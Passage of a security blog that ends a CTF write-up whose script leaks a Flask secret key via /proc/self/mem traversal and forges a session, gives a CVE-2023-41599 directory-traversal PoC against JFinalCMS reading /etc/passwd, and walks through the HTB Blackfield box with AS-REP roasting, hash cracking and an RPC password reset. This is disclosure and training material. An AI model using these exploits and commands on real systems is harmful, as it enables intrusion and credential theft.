<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests, re</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://127.0.0.1:8000/"</span></span><br><span class="line">maps_url = <span class="string">f"<span class="subst">{url}</span>/books?page_size=8000&book=.../.../.../.../.../.../proc/self/maps"</span></span><br><span class="line">maps_reg = <span class="string">"([a-z0-9]{12}-[a-z0-9]{12}) rw.*?00000000 00:00 0"</span></span><br><span class="line">maps = re.findall(maps_reg, requests.get(maps_url).text)</span><br><span class="line"><span class="keyword">for</span> m <span class="keyword">in</span> maps:</span><br><span class="line"> start, end = m.split(<span class="string">"-"</span>)[<span class="number">0</span>], m.split(<span class="string">"-"</span>)[<span class="number">1</span>]</span><br><span class="line"> Offset, Length = <span class="built_in">str</span>(<span 
class="built_in">int</span>(start, <span class="number">16</span>)), <span class="built_in">str</span>(<span class="built_in">int</span>(end, <span class="number">16</span>) - <span class="built_in">int</span>(start, <span class="number">16</span>))</span><br><span class="line"> <span class="comment"># print(Offset,Length)</span></span><br><span class="line"> Offset = <span class="built_in">int</span>(Offset)</span><br><span class="line"> Length = <span class="built_in">int</span>(Length)</span><br><span class="line"> <span class="comment"># print(Offset)</span></span><br><span class="line"> read_url = <span class="string">f"<span class="subst">{url}</span>/books?page=<span class="subst">{<span class="built_in">int</span>((Offset/Length)+<span class="number">1</span>)}</span>&book=.../.../.../.../.../.../proc/self/mem&page_size=<span class="subst">{Length}</span>"</span></span><br><span class="line"> res = requests.get(read_url)</span><br><span class="line"> <span class="keyword">if</span>(res.status_code != <span class="number">200</span>):</span><br><span class="line"> read_url = <span class="string">f"<span class="subst">{url}</span>/books?page=<span class="subst">{<span class="built_in">int</span>((Offset/Length)+<span class="number">2</span>)}</span>&book=.../.../.../.../.../.../proc/self/mem&page_size=<span class="subst">{Length}</span>"</span></span><br><span class="line"> <span class="comment"># print(read_url)</span></span><br><span class="line"> res = requests.get(read_url)</span><br><span class="line"> <span class="keyword">if</span>(res.status_code != <span class="number">200</span>):</span><br><span class="line"> <span class="built_in">print</span>(Offset,<span class="string">"failed"</span>)</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span>(Offset,<span class="string">"success"</span>)</span><br><span 
class="line"> <span class="keyword">if</span> res.content.find(<span class="string">b"\\xff\\xff\\xff\\xe4\\x00\\x87\\x01\\x97\\x00d\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"</span>) != -<span class="number">1</span> <span class="keyword">and</span> res.content.find(<span class="string">b"\\x00\\x02S\\x00\\x00\\x00"</span>) != -<span class="number">1</span>:</span><br><span class="line"> num = re.findall(<span class="string">"00[0-9a-f]{32}"</span>,res.text.replace(<span class="string">"\\x00"</span>,<span class="string">""</span>))</span><br><span class="line"> <span class="keyword">if</span>(<span class="built_in">len</span>(num)!=<span class="number">0</span>):</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> num:</span><br><span class="line"> <span class="built_in">print</span>(i)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>运行结果如下:</p>
<img src="/undefined/59bc99f5/QQ%E6%88%AA%E5%9B%BE20230530170119.png" class="">
<p>如图所示,前者为SECRET_KEY,后者为key,去掉开头的00后就是对应的值。</p>
<h2 id="0x03-爆破key"><a href="#0x03-爆破key" class="headerlink" title="0x03 爆破key"></a>0x03 爆破key</h2><p>紧接着,我们就需要爆破key的值。此处我们需要根据session来获取一个时间戳作为锚点,因为从代码中我们可以知道,session的生成时间取决于我们何时访问<strong>/books</strong>路由,而key的生成时间取决于程序何时开始运行,所以我们需要以session的时间戳为起点,往前疯狂爆破,只能说,很crazy。在本地环境下,我们可以通过快速访问生成session来减小两者的时间差,但是题目环境中就不会那么友好了。</p>
<p>session时间戳位置:</p>
<img src="/undefined/59bc99f5/QQ%E6%88%AA%E5%9B%BE20230530170139.png" class="">
<p>获取时间戳的值:</p>
<img src="/undefined/59bc99f5/QQ%E6%88%AA%E5%9B%BE20230530170035.png" class="">
<p>但由于此处是纳秒级的时间戳,所以在此基础之上还需要在后面补9个0,然后再往前爆破。脚本如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line">origin=<span class="number">1685436396000000000</span></span><br><span class="line"><span class="keyword">while</span>(<span class="number">1</span>):</span><br><span class="line"> <span class="keyword">if</span> hashlib.md5(<span class="built_in">str</span>(origin).encode()).hexdigest() == <span class="string">"34089e332229929cfc64344e3baf4f61"</span>:</span><br><span class="line"> <span class="built_in">print</span>(origin)</span><br><span class="line"> exit(<span class="number">0</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> origin=origin-<span class="number">1</span></span><br></pre></td></tr></table></figure>
<img src="/undefined/59bc99f5/QQ%E6%88%AA%E5%9B%BE20230530170045.png" class="">
<p>本地可以直接单线程,但是根据情况我们应该需要编写多线程脚本来降低爆破的时间,或者利用其它工具来降低爆破时间提高成功率。</p>
<h2 id="0x04伪造session"><a href="#0x04伪造session" class="headerlink" title="0x04伪造session"></a>0x04伪造session</h2><p>这个应该都比较熟悉,flask伪造session,利用脚本<strong>flask_session_cookie_manager</strong>就好了,因为此处已经获得了key的原值和SECRET_KEY,所以可以直接伪造。</p>
<img src="/undefined/59bc99f5/image-20230530201950885.png" class="">
<p>最后就可以拿到flag了。</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/68b58dca.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/68b58dca.html" class="post-title-link" itemprop="url">CVE-2023-41599</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2024-09-27 20:50:46" itemprop="dateCreated datePublished" datetime="2024-09-27T20:50:46+08:00">2024-09-27</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2024-09-28 20:29:01" itemprop="dateModified" datetime="2024-09-28T20:29:01+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<h1 id="Directory-traversal-in-JFinalCMS"><a href="#Directory-traversal-in-JFinalCMS" class="headerlink" title="Directory traversal in JFinalCMS"></a>Directory traversal in JFinalCMS</h1><blockquote>
<p>source code: <a target="_blank" rel="noopener" href="https://gitee.com/heyewei/JFinalcms">https://gitee.com/heyewei/JFinalcms</a></p>
<p>Official website :<a target="_blank" rel="noopener" href="http://www.xiadaima.com/">http://www.xiadaima.com/</a></p>
</blockquote>
<h2 id="Analyze"><a href="#Analyze" class="headerlink" title="Analyze:"></a>Analyze:</h2><p>The vulnerable code is in <code>com/cms/controller/common/DownController.java</code></p>
<img src="/undefined/68b58dca/image-20230828144150045.png" class="">
<p>We can easily see that the <code>file</code> function concatenates the file name from the <code>fileKey</code> parameter directly onto the base file path as a string, without any blacklist/whitelist check or other security validation, which allows us to perform directory traversal.</p>
<img src="/undefined/68b58dca/image-20230828144143097.png" class="">
<p>poc:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">I set a test.txt in E:\test.txt.And this java sysytem is also set in E-disk.</span><br><span class="line">Windows: /common/down/file?fileKey=/../../../../../../../../../test.txt</span><br><span class="line">Linux: /common/down/file?fileKey=/../../../../../../../../../etc/passwd</span><br></pre></td></tr></table></figure>
<img src="/undefined/68b58dca/image-20230828144727066.png" class="">
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/3db8feaa.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/3db8feaa.html" class="post-title-link" itemprop="url">Road-to-OSCP-7-Blackfield</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2023-05-09 23:51:50" itemprop="dateCreated datePublished" datetime="2023-05-09T23:51:50+08:00">2023-05-09</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2024-09-28 20:29:22" itemprop="dateModified" datetime="2024-09-28T20:29:22+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<h1 id="HTB-Blackfiled-Walkthrough"><a href="#HTB-Blackfiled-Walkthrough" class="headerlink" title="HTB Blackfield Walkthrough"></a>HTB Blackfield Walkthrough</h1><h2 id="0x00-盒子简介"><a href="#0x00-盒子简介" class="headerlink" title="0x00 盒子简介"></a>0x00 盒子简介</h2><img src="/undefined/3db8feaa/Blackfield.png" class="">
<h2 id="0x01-思路简介"><a href="#0x01-思路简介" class="headerlink" title="0x01 思路简介"></a>0x01 思路简介</h2><p> 获得靶机后,我运用nmap进行服务端口信息收集,发现可以利用匿名用户访问共享文件夹profiles$,里面虽然没有任何内容,但我们可以利用其文件夹列表建立用户名列表,然后利用AS-REP roasting获得有效凭证,再利用bloodhound发现该用户的权限,从而通过RPC重置另一个账户的密码,然后利用该账户访问另一个共享文件夹,从中获得了lsass的内存转储,并在本地利用pypykatz转储其中的哈希值。最后,以新获取的用户通过winrm登录,利用SeBackupPrivilege权限来备份ntds.dit,从而进一步获得所有账户的哈希转储。</p>
<h2 id="0x02-Recon"><a href="#0x02-Recon" class="headerlink" title="0x02 Recon"></a>0x02 Recon</h2><h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><p>TCP:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ nmap --min-rate 10000 -p- -Pn -oN nmaptcp</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$ nmap -p 53,88,135,445,3268,5985 -sC -sV -oN nmaptcp</span><br><span class="line">Nmap scan report for 10.10.10.192 </span><br><span class="line">Host is up (0.46s latency).</span><br><span class="line"> </span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">53/tcp open domain Simple DNS Plus</span><br><span class="line">88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-09 16:08:58Z)</span><br><span class="line">135/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">445/tcp open microsoft-ds?</span><br><span class="line">3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)</span><br><span class="line">5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-title: Not Found </span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span 
class="line"></span><br><span class="line">Host script results: </span><br><span class="line">| smb2-time: </span><br><span class="line">| date: 2023-05-09T16:09:19</span><br><span class="line">|_ start_date: N/A </span><br><span class="line">|_clock-skew: 6h59m59s </span><br><span class="line">| smb2-security-mode: </span><br><span class="line">| 311: </span><br><span class="line">|_ Message signing enabled and required</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line"># Nmap done at Tue May 9 17:10:00 2023 -- 1 IP address (1 host up) scanned in 72.69 seconds</span><br></pre></td></tr></table></figure>
<p>UDP:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ nmap -sU --min-rate=1000 -p- -oN nmapudp 10.10.10.192</span><br><span class="line">Nmap scan report for 10.10.10.192</span><br><span class="line">Host is up (0.79s latency).</span><br><span class="line">Not shown: 65533 open|filtered udp ports (no-response)</span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">53/udp open domain</span><br><span class="line">389/udp open ldap</span><br></pre></td></tr></table></figure>
<h3 id="ldap"><a href="#ldap" class="headerlink" title="ldap"></a>ldap</h3><p>获得了<code>domain name</code>:BLACKFIELD.local</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ ldapsearch -H ldap://10.10.10.192 -x -s base namingcontexts</span><br><span class="line"></span><br><span class="line">namingcontexts: DC=BLACKFIELD,DC=local</span><br><span class="line">namingcontexts: CN=Configuration,DC=BLACKFIELD,DC=local</span><br><span class="line">namingcontexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local</span><br><span class="line">namingcontexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local</span><br><span class="line">namingcontexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local</span><br></pre></td></tr></table></figure>
<h3 id="smb"><a href="#smb" class="headerlink" title="smb"></a>smb</h3><p>发现可以匿名访问两个共享文件夹</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ smbmap -H 10.10.10.192 -u null </span><br><span class="line">[+] Guest session IP: 10.10.10.192:445 Name: 10.10.10.192 </span><br><span class="line"> Disk Permissions Comment</span><br><span class="line"> ---- ----------- -------</span><br><span class="line"> ADMIN$ NO ACCESS Remote Admin</span><br><span class="line"> C$ NO ACCESS Default share</span><br><span class="line"> forensic NO ACCESS Forensic / Audit share.</span><br><span class="line"> IPC$ READ ONLY Remote IPC</span><br><span class="line"> NETLOGON NO ACCESS Logon server share </span><br><span class="line"> profiles$ READ ONLY</span><br><span class="line"> SYSVOL NO ACCESS Logon server share</span><br></pre></td></tr></table></figure>
<p>最后在<code>profiles$</code>中找到了一些有效的内容:虽然每个文件夹中都没有文件,但关注到文件夹名称,我们可以收集文件夹名作为用户名列表。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$ smbclient -N \\\\10.10.10.192\\profiles$ </span><br><span class="line">Try "help" to get a list of possible commands. </span><br><span class="line">smb: \> ls </span><br><span class="line"> . D 0 Thu Jun 4 00:47:12 2020 </span><br><span class="line"> .. 
D 0 Thu Jun 4 00:47:12 2020 </span><br><span class="line"> AAlleni D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ABarteski D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ABekesz D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ABenzies D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ABiemiller D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> AChampken D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ACheretei D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> ACsonaki D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> AHigchens D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> AJaquemai D 0 Thu Jun 4 00:47:11 2020 </span><br><span class="line"> AKlado D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AKoffenburger D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AKollolli D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AKruppe D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AKubale D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> ALamerz D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AMaceldon D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> AMasalunga D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> ANavay D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> ANesterova D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> ANeusse D 0 Thu Jun 4 00:47:11 2020</span><br><span class="line"> <SNIP></span><br></pre></td></tr></table></figure>
<p>下载所有文件夹后,将所有文件名整理到文件中。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">smb: \> recurse on</span><br><span class="line">smb: \> prompt off</span><br><span class="line">smb: \> mget *</span><br><span class="line">smb: \></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ls -al|cut -d ':' -f2|tr ' ' ','|cut -d ',' -f2 > users</span><br></pre></td></tr></table></figure>
<h2 id="0x03-Access-as-support"><a href="#0x03-Access-as-support" class="headerlink" title="0x03 Access as support"></a>0x03 Access as support</h2><h3 id="userenum"><a href="#userenum" class="headerlink" title="userenum"></a>userenum</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">$ ./kerbrute_ userenum --dc 10.10.10.192 -d BLACKFIELD.LOCAL /home/sollupus/OSCP/Blackfield/Creds/users -t 50 </span><br><span class="line"></span><br><span class="line"> __ __ __ </span><br><span class="line"> / /_____ _____/ /_ _______ __/ /____ </span><br><span class="line"> / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \</span><br><span class="line"> / ,< / __/ / / /_/ / / / /_/ / /_/ __/</span><br><span class="line">/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ </span><br><span class="line"></span><br><span class="line">Version: v1.0.3 (9dad6e1) - 05/09/23 - Ronnie Flathers @ropnop</span><br><span class="line"></span><br><span class="line">2023/05/09 22:41:09 > Using KDC(s):</span><br><span class="line">2023/05/09 22:41:09 > 10.10.10.192:88</span><br><span class="line"></span><br><span class="line">2023/05/09 22:41:14 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2023/05/09 22:41:43 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2023/05/09 22:41:43 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2023/05/09 22:41:48 > Done! 
Tested 315 usernames (3 valid) in 39.649 seconds</span><br></pre></td></tr></table></figure>
<h3 id="AS-REP-roast"><a href="#AS-REP-roast" class="headerlink" title="AS-REP roast"></a>AS-REP roast</h3><p>获得有效用户名列表后,利用impacket里的<code>GetNPUsers</code>执行AS-REP roasting</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ impacket-GetNPUsers 'BLACKFIELD.LOCAL/' -usersfile vali_user -format hashcat -outputfile hashes.asp -dc-ip 10.10.10.192</span><br><span class="line"></span><br><span class="line">$ cat hashes.asp </span><br><span class="line">[email protected]:a3ed233fba253c99c06ebaf99736a3bc$e03c1b4d964a5d247b12222254efa9501b9d0be17bb089af9cd18bd7384c24619d153a0fd1d5f5981e3196c258c9a67c41a9a59ea0876bf8a3fd0e257c0c4147aa589fe5ef920f78e61f11b80dc61b87ba157aa01027433501dcd98e89c51b192fb2735adf5145cdcbbab27a0bb944acef1d0d5b2c0c782ddd8427843a6bf13f124ca8f68550eddddcb2686fdbbeb3c2d79b51f5f4991141242a79d2e7cb8157e833c8e04f401c0d2d927b40d334400e7ffcb63104c8ad735bfb4f5c1ca3ae1716bdf497ad15f52a1ba2d2776463711841493b0d5611bbc8906e1827bc32c38fa2e686bf38f695c7b0040583dcb1d7faf73a7e8a</span><br></pre></td></tr></table></figure>
<h3 id="Crack-Hash"><a href="#Crack-Hash" class="headerlink" title="Crack Hash"></a>Crack Hash</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ hashcat -m 18200 --force hashes.asp /usr/share/wordlists/rockyou.txt</span><br><span class="line"></span><br><span class="line"><SNIP></span><br><span class="line">[email protected]:a3ed233fba253c99c06ebaf99736a3bc$e03c1b4d964a5d247b12222254efa9501b9d0be17bb089af9cd18bd7384c24619d153a0fd1d5f5981e3196c258c9a67c41a9a59ea0876bf8a3fd0e257c0c4147aa589fe5ef920f78e61f11b80dc61b87ba157aa01027433501dcd98e89c51b192fb2735adf5145cdcbbab27a0bb944acef1d0d5b2c0c782ddd8427843a6bf13f124ca8f68550eddddcb2686fdbbeb3c2d79b51f5f4991141242a79d2e7cb8157e833c8e04f401c0d2d927b40d334400e7ffcb63104c8ad735bfb4f5c1ca3ae1716bdf497ad15f52a1ba2d2776463711841493b0d5611bbc8906e1827bc32c38fa2e686bf38f695c7b0040583dcb1d7faf73a7e8a:#00^BlackKnight</span><br><span class="line"><SNIP></span><br></pre></td></tr></table></figure>
<h3 id="Access-Check"><a href="#Access-Check" class="headerlink" title="Access Check"></a>Access Check</h3><p>smb->access</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'</span><br><span class="line"></span><br><span class="line">SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)</span><br><span class="line">SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight:#00^BlackKnight</span><br></pre></td></tr></table></figure>
<p>winrm->failed</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'</span><br><span class="line">SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)</span><br><span class="line">HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman</span><br><span class="line">WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\support:#00^BlackKnight</span><br></pre></td></tr></table></figure>
<h2 id="0x04-support-gt-audit2020"><a href="#0x04-support-gt-audit2020" class="headerlink" title="0x04 support -> audit2020"></a>0x04 support -> audit2020</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight' </span><br><span class="line">[+] IP: 10.10.10.192:445 Name: 10.10.10.192 </span><br><span class="line"> Disk Permissions Comment</span><br><span class="line"> ---- ----------- -------</span><br><span class="line"> ADMIN$ NO ACCESS Remote Admin</span><br><span class="line"> C$ NO ACCESS Default share</span><br><span class="line"> forensic NO ACCESS Forensic / Audit share.</span><br><span class="line"> IPC$ READ ONLY Remote IPC</span><br><span class="line"> NETLOGON READ ONLY Logon server share </span><br><span class="line"> profiles$ READ ONLY</span><br><span class="line"> SYSVOL READ ONLY Logon server share</span><br></pre></td></tr></table></figure>
<p>遍历可进入的共享文件夹后,发现并没有什么可用信息。</p>
<h3 id="bloodhound"><a href="#bloodhound" class="headerlink" title="bloodhound"></a>bloodhound</h3><p>于是尝试用bloodhound分析域内的权限关系</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python3 bloodhound.py -u support -p '#00^BlackKnight' -c All -ns 10.10.10.192 -d blackfield.local --zip</span><br></pre></td></tr></table></figure>
<p>将得到的zip包导入到Bloodhound中,然后找到了如下信息。</p>
<img src="/undefined/3db8feaa/image-20230509230203124.png" class="">
<p>这意味着,我们可以强制更改AUDIT2020账号的密码。</p>
<h3 id="Password-Reset-Over-Rpc"><a href="#Password-Reset-Over-Rpc" class="headerlink" title="Password Reset Over Rpc"></a>Password Reset Over Rpc</h3><blockquote>
<p><a target="_blank" rel="noopener" href="https://room362.com/post/2017/reset-ad-user-password-with-linux/">https://room362.com/post/2017/reset-ad-user-password-with-linux/</a></p>
</blockquote>
<p>我们可以用rpcclient登录,然后用<code>setuserinfo2</code>命令来更改账户密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ rpcclient -U support 10.10.10.192 </span><br><span class="line">Password for [WORKGROUP\support]:</span><br><span class="line">rpcclient $> setuserinfo2 audit2020 23 'Password@!!'</span><br></pre></td></tr></table></figure>
<h3 id="Access-check"><a href="#Access-check" class="headerlink" title="Access check"></a>Access check</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'Password@!!' 130 ⨯</span><br><span class="line">SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)</span><br><span class="line">SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password@!!:Password@!!</span><br></pre></td></tr></table></figure>
